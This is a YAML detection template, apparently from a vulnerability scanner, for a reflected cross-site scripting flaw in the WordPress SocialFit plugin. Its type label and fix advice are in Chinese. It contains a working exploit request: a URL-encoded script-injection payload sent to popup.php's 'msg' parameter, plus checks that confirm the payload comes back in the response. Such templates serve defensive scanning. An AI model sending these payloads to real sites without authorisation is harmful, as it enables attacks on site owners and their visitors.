product: WordPress
vName: WordPress SocialFit - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress SocialFit is vulnerable to a cross-site scripting vulnerability via the 'msg' parameter because it fails to properly sanitize user-supplied input.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/37481
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
    verify:
      logic: and
      check:
        - body:
            value:
              - </script><script>alert(document.domain)</script>
              - <title>Google+
              - window.___gcfg
            logic: or
        - header:
            value:
              - text/html
            logic: and
        - status: 200
